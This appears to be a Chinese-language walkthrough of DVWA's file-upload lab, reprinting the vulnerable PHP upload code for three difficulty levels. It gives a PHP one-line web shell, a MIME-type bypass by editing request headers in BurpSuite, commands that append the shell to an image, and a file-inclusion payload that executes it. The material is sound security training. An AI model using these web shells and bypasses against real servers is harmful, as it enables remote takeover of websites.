DVWA File Upload

文件上传漏洞

Low

查看源码(View Source)

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

分析

前端页面说明Choose an image to upload,也就是希望上传一张图片。但是,后端程序没有对上传的文件进行判断。此处有文件上传漏洞。

一句话木马

利用一句话木马,可以用中国菜刀或蚁剑连接服务器。

<?php @eval($_POST['cmd']);?>

上传文件

将一句话木马保存为php文件。

在前端网页进行上传,得到了地址../../hackable/uploads/test.php

完整地址为:http://localhost/dvwa/hackable/uploads/test.php

蚁剑连接

Github上下载中国蚁剑:https://github.com/AntSwordProject/AntSword-Loader/releases/download/4.0.3/

蚁剑连接

meduim

查看源码(View Source)


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

分析

后端程序对文件类型、文件大小进行了限制,要求文件类型为image/jpegimage/png,文件的大小小于100000字节。

MIME类型

MIME类型可以简单地理解为文件类型。

每一种带有后缀名的文件都对应一种MIME类型,每一种MINE类型对应一种或多种后缀名。

例如:

  1. image/jpeg对应jpgjpeg文件。
  2. image/png对应png文件。

常用的MIME类型如下:

  • 图片类
MIME类型后缀名
image/jpegjpg, jpeg
image/pngpng
image/gifgif
  • 文本数据类
MIME类型后缀名
text/plaintxt,c,h,...
text/htmlhtml,htm
application/jsonjson

jpg等图片之类的文件属于静态文件,一般由web服务器直接返回,而不经过PHP处理。

nginx配置文件

因此,如果直接将文件的后缀名改为jpg然后upload,蚁剑是连接不上服务器的。

可以看到,后端程序没有对文件的后缀名进行判断,可以用BurpSuite修改请求头(Request Headers)中文件的MIME类型。

BurpSuite

BurpSuite有社区版(Community),专业版(Professional)和企业版(Enterprise)。目前,用免费的社区版就行了。

具体的使用方法就不写了。

修改Headers

修改请求头

high

查看源码(View Source)


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

分析

几个函数

  • strrpos()

    > strrpos() 函数查找字符串在另一字符串中最后一次出现的位置(区分大小写)。
    
  • substr()

substr() 函数返回字符串的一部分。

  • strtolower()

strtolower() 函数把字符串转换为小写。

  • getimagesize()

getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。

从这几个函数可以了解到:

  1. 后端程序提取出上传文件的后缀名,并且都转换为小写。
  2. 后端程序可以识别上传的文件是否为图片文件。

一句话木马写入图片

查阅资料之后得知,一句话木马是可以写入图片里的。

Windows命令如下:

copy 11.png/b + phpinfo.php/a 111.jpg

# 11.png是原图片
# phpinfo.php是写有一句话木马的php文件
# 111.jpg是生成的带有一句话木马的图片

Linux命令如下:

cat phpinfo.php >> 11.png

将后缀名改为php,在low level下进行测试,蚁剑可以上。

文件包含

前面已经说过了,图片文件web服务器会直接返回。

而后端程序也会对上传文件的名称进行检测,因此,上传到服务器上的是一个实实在在的“图片文件”。

这里不得不提到文件包含漏洞(虽然暂时还没有做File Inclusion)。

利用在low level的File Inclusion的文件包含漏洞。

payload:?page=../../hackable/uploads/11.png

利用文件包含漏洞解析上传的“图片文件”,然后 用蚁剑进行连接。